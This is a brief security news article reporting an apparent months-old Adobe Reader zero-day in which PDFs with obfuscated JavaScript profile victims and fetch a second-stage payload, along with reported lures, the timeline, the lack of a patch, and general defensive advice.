Months-old Adobe Reader zero-day uses PDFs to size up targets

April 9, 2026
aisecurityopen-sourcegovernment
A close-up of an archery target with arrows, set outdoors, demonstrating accuracy.
Photo by Meri Verbina on Pexels

It has been reported that hackers have been quietly exploiting what appears to be a zero-day in Adobe Acrobat Reader for months, weaponising seemingly ordinary PDFs to profile victims before deciding whether to fully compromise them. Security researcher Haifei Li, founder of sandbox-based detector EXPMON, says the malicious documents execute on open — no extra clicks needed — and work against up-to-date Reader installs. Sneaky? Absolutely.

How the PDF works

The exploit allegedly uses heavily obfuscated JavaScript that fires as soon as the file is viewed and leans on legitimate Acrobat APIs to pull system data. It harvests OS details, language settings and local file paths, then phones home to attacker-controlled servers. That first pass is seemingly just reconnaissance. “Such a mechanism allows the threat actor to collect user information, steal local data, perform advanced 'fingerprinting', and launch future attacks,” Li warned. If the host checks out, a second-stage payload is fetched and executed inside Reader — researchers say that could lead to remote code execution or even a sandbox escape.

Targets, timeline and unanswered questions

It has been reported that researcher Gi7w0rm found lure documents tied to the campaign containing Russian-language content about oil and gas — a hint, not proof, that the attackers were aiming at a particular audience rather than casting a wide net. A related sample was uploaded to VirusTotal on November 28, 2025, suggesting this operation has been active for months. Worryingly, there is still no CVE, no patch, and it has been reported that Adobe hasn't publicly responded to inquiries, leaving users exposed for the time being.

What to do now

So what can you do? Don't open PDFs from unknown senders. Use layered defenses — endpoint detection, strict email filters, and PDF viewers that restrict JavaScript. Patch when Adobe finally issues one (and it will have to), because this is one of those “silent for months” stories that make security teams lose sleep. Who wants that? Not me. Not you.

Sources: The Register